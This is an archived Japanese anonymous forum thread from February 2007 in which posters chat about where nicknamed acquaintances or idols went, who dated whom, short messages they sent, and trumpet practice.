651 :ユーは名無しネ:2007/02/01(木) 00:22:39
ウナはどこに行ったの

652 :ユーは名無しネ:2007/02/01(木) 07:20:08
デート

653 :ユーは名無しネ:2007/02/01(木) 17:46:41
秘密のデート ?

654 :ユーは名無しネ:2007/02/01(木) 21:30:10
ウナは割といつも堂々と

655 :ユーは名無しネ:2007/02/03(土) 12:01:36
ウナは枝とかと見に行くんじゃないの!?

656 :ユーは名無しネ:2007/02/03(土) 12:31:42
生憎枝は古株と来ました

657 :ユーは名無しネ:2007/02/03(土) 14:45:40
ゑと行くんじゃないの!?

658 :ユーは名無しネ:2007/02/04(日) 00:32:05
枝古株行ったのか

659 :ユーは名無しネ:2007/02/04(日) 23:31:32
枝と古株いつ?

660 :ユーは名無しネ:2007/02/05(月) 12:40:42
ウナコタと行ったな

661 :ユーは名無しネ:2007/02/13(火) 13:18:34
チャンの顔文字ワロス

662 :ユーは名無しネ:2007/02/13(火) 20:03:45
メッセ嬉しいな
2人共字が小さすぎてワロス

663 :ユーは名無しネ:2007/02/14(水) 02:54:16
仕事ないとかヤバイよね。
しかも大学は休みだし。
チャンの大学ってあれなんて読むの?

664 :ユーは名無 しネ:2007/02/14(水) 14:33:05
>663

665 :ユーは名無しネ:2007/02/14(水) 21:21:05
2人ともらしい文面でワロス
しかし字が小さ杉

666 :ユーは名無しネ:2007/02/15(木) 15:47:44
ウナはニカチャとトランペットの練習中と言ってみるテスト

667 :ユーは名無しネ:2007/02/15(木) 22:57:42
トランペット?

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)